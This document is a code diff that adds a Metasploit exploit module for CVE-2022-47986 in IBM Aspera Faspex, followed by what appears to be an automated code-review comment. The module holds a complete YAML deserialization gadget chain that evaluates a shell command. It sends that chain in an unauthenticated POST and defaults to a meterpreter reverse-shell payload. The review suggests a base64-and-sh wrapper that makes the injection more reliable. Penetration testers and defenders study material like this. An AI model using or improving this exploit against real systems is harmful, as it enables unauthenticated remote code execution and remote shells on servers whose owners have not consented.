diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
new file mode 100644
index 000000000000..0f114506cc30
--- /dev/null
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -0,0 +1,134 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'IBM Aspera Faspex YAML deserialization vulnerability', + 'Description' => %q{ + This module exploits an unauthenticated YAML deserialization vulnerability + which exists in IBM Aspera Faspex version 4.4.2 Patch Level 1 and below (CVE-2022-47986). + }, + 'References' => [ + ['CVE', '2022-47986'], + ['URL', 'https://www.ibm.com/support/pages/node/6952319'], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-47986'], + ['URL', 'https://github.com/ohnonoyesyes/CVE-2022-47986/blob/main/poc.py'], + ['URL', 'https://thehackernews.com/2023/03/icefire-linux-ransomware.html'], + ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis'], + ], + 'Author' => [ + 'ohnonoyesyes', # POC + 'Maurice LAMBERT', # Metasploit auxiliary module + ], + 'DisclosureDate' => '2023-02-02', + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], + 'DefaultOptions' => { + 'RPORT' => 443, + 'SSL' => true + }, + 'Targets' => [ + [ + 'Unix Command', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_cmd, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp', + 'RPORT' => 9000 + } + } + ], + ], + 'CmdStagerFlavor' => [ 'echo' ], + 'Payload' => { 'BadChars' => '`' }, + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] + } + ) + ) + register_options( + [OptString.new('TARGETURI', [ false, 'The base path for the IBM Aspera Faspex 
Application.', '/aspera/faspex'])] + ) + end + + def execute_command(command, _opts = {}) + exploit = <<~EOT + --- + - !ruby/object:Gem::Installer + i: x + - !ruby/object:Gem::SpecFetcher + i: y + - !ruby/object:Gem::Requirement + requirements: + !ruby/object:Gem::Package::TarReader + io: &1 !ruby/object:Net::BufferedIO + io: &1 !ruby/object:Gem::Package::TarReader::Entry + read: 0 + header: "pew" + debug_output: &1 !ruby/object:Net::WriteAdapter + socket: &1 !ruby/object:PrettyPrint + output: !ruby/object:Net::WriteAdapter + socket: &1 !ruby/module "Kernel" + method_id: :eval + newline: "throw `#{command}`" + buffer: {} + group_stack: + - !ruby/object:PrettyPrint::Group + break: true + method_id: :breakable + EOT + uuid = SecureRandom.uuid + + payload = { + "package_file_list[]": '/', + external_emails: exploit, + package_name: 'assetnote_pack', + package_note: Rex::Text.rand_text(50, bad: '', chars: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15).to_s, + original_sender_name: Rex::Text.rand_name.to_s, + package_uuid: uuid.to_s, + metadata_human_readable: 'Yes', + forward: 'pew', + metadata_json: '{}', + delivery_uuid: uuid.to_s, + delivery_sender_name: Rex::Text.rand_name.to_s, + delivery_title: Rex::Text.rand_text_alphanumeric(4).to_s, + delivery_note: Rex::Text.rand_text_alphanumeric(12).to_s, + delete_after_download: true, + delete_after_download_condition: 'IDK' + } + + response = send_request_raw({ + 'method' => 'POST', + 'uri' => normalize_uri(datastore['TARGETURI'], '/package_relay/relay_package'), + 'data' => URI.encode_www_form(payload) + }) + if response && response.body + return response.body + end + + false + end + + def exploit + print_status('Exploiting...') + execute_command(payload.encoded) + end +end
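Review bot: `execute_command` interpolates the generated command straight into the YAML document's double-quoted scalar (`newline: "throw `#{command}`"`), but `'Payload' => { 'BadChars' => '`' }` only rules out the backtick, so any `"` or `\` in the encoded payload will terminate the scalar early or be read as a YAML escape and the request dies in the parser before `eval` is ever reached. A neutral wrapper sidesteps this without tightening bad chars: `newline: "throw `echo #{Rex::Text.encode_base64(command)} | base64 -d | sh`"` (the base64 alphabet is inert in both YAML and sh); the alternative of adding `"` and `\` to BadChars may leave the default python payload ungeneratable. Separately, `Msf::Exploit::EXE`, `FileDropper` and `CmdStager` are included and `Arch` advertises ARCH_X64/ARCH_X86, yet `exploit` only calls `execute_command(payload.encoded)` against a single ARCH_CMD target, so either the unused mixins and arches should go or a dropper target that calls `execute_cmdstager` should be added. There is also no `check` method, so the module fires the deserialization blind and never reports whether the POST to `package_relay/relay_package` did anything beyond `execute_command` returning a truthy body.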